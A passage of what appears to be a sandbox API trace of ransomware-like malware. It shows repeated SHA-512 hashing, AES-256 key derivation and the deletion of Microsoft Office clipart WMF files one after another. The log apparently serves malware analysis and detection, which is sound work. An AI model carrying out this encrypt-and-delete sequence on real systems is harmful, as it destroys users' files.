CryptDestroyHash (hHash=0x9ad478) returned 1 [0191.755] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0191.757] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0191.758] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.758] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad678) returned 1 [0191.758] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.758] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.758] wcslen (_String="\\\\?\\") returned 0x4 [0191.762] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 1 [0191.762] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf")) returned 1 [0191.763] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0191.763] wcslen (_String="OK") returned 0x2 [0191.763] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.763] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.763] CryptDestroyKey (hKey=0x9ad678) returned 1 [0191.763] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0191.763] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0191.765] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0191.765] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.765] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad6b8) returned 1 [0191.765] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.766] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.766] wcslen (_String="\\\\?\\") returned 0x4 [0191.782] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 1 [0191.782] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf")) returned 1 [0191.783] CryptDestroyKey (hKey=0x9ad338) returned 1 [0191.783] wcslen (_String="OK") returned 0x2 [0191.783] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.783] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.783] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0191.783] CryptDestroyHash (hHash=0x9ad478) returned 1 [0191.783] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0191.786] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0191.786] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.786] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad338) returned 1 [0191.786] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.786] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.786] wcslen (_String="\\\\?\\") returned 0x4 [0191.872] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 1 [0191.872] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf")) returned 1 [0191.873] CryptDestroyKey (hKey=0x9ad878) returned 1 [0191.873] wcslen (_String="OK") returned 0x2 [0191.873] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.873] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.873] CryptDestroyKey (hKey=0x9ad338) returned 1 [0191.873] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0191.873] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0191.875] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0191.875] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.875] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad738) returned 1 [0191.875] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.875] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.875] wcslen (_String="\\\\?\\") returned 0x4 [0191.917] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 1 [0191.917] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf")) returned 1 [0191.918] CryptDestroyKey (hKey=0x9ad478) returned 1 [0191.918] wcslen (_String="OK") returned 0x2 [0191.918] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.918] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.918] CryptDestroyKey (hKey=0x9ad738) returned 1 [0191.918] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0191.918] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0191.920] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0191.920] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.920] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad138) returned 1 [0191.920] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.920] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.920] wcslen (_String="\\\\?\\") returned 0x4 [0192.038] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 1 [0192.038] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf")) returned 1 [0192.039] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0192.039] wcslen (_String="OK") returned 0x2 [0192.039] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.039] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.039] CryptDestroyKey (hKey=0x9ad138) returned 1 [0192.039] CryptDestroyHash (hHash=0x9ad478) returned 1 [0192.039] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0192.041] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0192.041] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.041] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad5b8) returned 1 [0192.041] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.041] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.041] wcslen (_String="\\\\?\\") returned 0x4 [0192.049] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 1 [0192.050] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf")) returned 1 [0192.050] CryptDestroyKey (hKey=0x9ad238) returned 1 [0192.050] wcslen (_String="OK") returned 0x2 [0192.050] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.051] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.051] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0192.051] CryptDestroyHash (hHash=0x9ad138) returned 1 [0192.051] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0192.052] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0192.052] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.052] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad138) returned 1 [0192.052] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.052] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.052] wcslen (_String="\\\\?\\") returned 0x4 [0192.056] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 1 [0192.056] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf")) returned 1 [0192.057] CryptDestroyKey (hKey=0x9ad238) returned 1 [0192.057] wcslen (_String="OK") returned 0x2 [0192.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.057] CryptDestroyKey (hKey=0x9ad138) returned 1 [0192.057] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0192.057] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0192.059] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0192.059] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.059] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad2f8) returned 1 [0192.059] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.059] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.059] wcslen (_String="\\\\?\\") returned 0x4 [0192.223] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 1 [0192.223] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf")) returned 1 [0192.225] CryptDestroyKey (hKey=0x9ad478) returned 1 [0192.225] wcslen (_String="OK") returned 0x2 [0192.225] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.225] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.225] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0192.225] CryptDestroyHash (hHash=0x9ad438) returned 1 [0192.225] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0192.227] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0192.227] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.227] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad178) returned 1 [0192.227] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.227] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.228] wcslen (_String="\\\\?\\") returned 0x4 [0192.284] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 1 [0192.284] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf")) returned 1 [0192.285] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0192.285] wcslen (_String="OK") returned 0x2 [0192.285] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.285] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.285] CryptDestroyKey (hKey=0x9ad178) returned 1 [0192.285] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0192.285] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0192.287] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0192.287] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.287] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad1b8) returned 1 [0192.287] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.287] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.287] wcslen (_String="\\\\?\\") returned 0x4 [0192.291] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 1 [0192.291] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf")) returned 1 [0192.292] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0192.292] wcslen (_String="OK") returned 0x2 [0192.292] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.292] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.292] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0192.292] CryptDestroyHash (hHash=0x9ad438) returned 1 [0192.292] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0192.300] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0192.300] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.300] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad2b8) returned 1 [0192.300] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.300] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.300] wcslen (_String="\\\\?\\") returned 0x4 [0192.312] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 1 [0192.312] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf")) returned 1 [0192.313] CryptDestroyKey (hKey=0x9ad238) returned 1 [0192.315] wcslen (_String="OK") returned 0x2 [0192.315] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.315] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.315] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0192.315] CryptDestroyHash (hHash=0x9ad378) returned 1 [0192.315] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0192.318] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0192.318] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.318] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad238) returned 1 [0192.318] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.318] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.318] wcslen (_String="\\\\?\\") returned 0x4 [0192.466] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 1 [0192.467] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf")) returned 1 [0192.468] CryptDestroyKey (hKey=0x9ad138) returned 1 [0192.468] wcslen (_String="OK") returned 0x2 [0192.468] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.468] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.468] CryptDestroyKey (hKey=0x9ad238) returned 1 [0192.468] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0192.468] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0192.470] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449bc | out: phHash=0x1d4449bc) returned 1 [0192.470] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.470] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4449c0 | out: phKey=0x1d4449c0*=0x9ad438) returned 1 [0192.470] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.471] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.471] wcslen (_String="\\\\?\\") returned 0x4 [0192.529] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 1 [0192.529] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf")) returned 1 [0192.530] CryptDestroyKey (hKey=0x9ad478) returned 1 [0192.530] wcslen (_String="OK") returned 0x2 [0192.530] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.530] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.530] CryptDestroyKey (hKey=0x9ad438) returned 1 [0192.530] CryptDestroyHash (hHash=0x9ad738) returned 1 [0192.530] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0192.532] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0192.532] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.532] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad4b8) returned 1 [0192.533] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.533] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.533] wcslen (_String="\\\\?\\") returned 0x4 [0192.557] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 1 [0192.557] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf")) returned 1 [0192.560] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0192.560] wcslen (_String="OK") returned 0x2 [0192.560] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.560] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.560] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0192.560] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0192.560] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0192.568] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44495c | out: phHash=0x1d44495c) returned 1 [0192.568] CryptHashData (hHash=0x9ad538, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.568] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad538, dwFlags=0x4, phKey=0x1d444960 | out: phKey=0x1d444960*=0x9ad1b8) returned 1 [0192.568] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.568] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.568] wcslen (_String="\\\\?\\") returned 0x4 [0192.573] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 1 [0192.574] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf")) returned 1 [0192.575] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0192.575] wcslen (_String="OK") returned 0x2 [0192.575] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.575] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.575] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0192.575] CryptDestroyHash (hHash=0x9ad538) returned 1 [0192.575] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0192.577] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0192.577] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.577] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad5f8) returned 1 [0192.577] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.577] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.577] wcslen (_String="\\\\?\\") returned 0x4 [0192.581] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 1 [0192.581] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf")) returned 1 [0192.582] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0192.582] wcslen (_String="OK") returned 0x2 [0192.582] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.582] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.582] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0192.582] CryptDestroyHash (hHash=0x9ad738) returned 1 [0192.582] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0192.585] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0192.585] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.585] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad1b8) returned 1 [0192.585] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.585] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.585] wcslen (_String="\\\\?\\") returned 0x4 [0192.598] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 1 [0192.598] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf")) returned 1 [0192.599] CryptDestroyKey (hKey=0x9ad178) returned 1 [0192.599] wcslen (_String="OK") returned 0x2 [0192.599] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.599] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.599] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0192.599] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0192.599] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 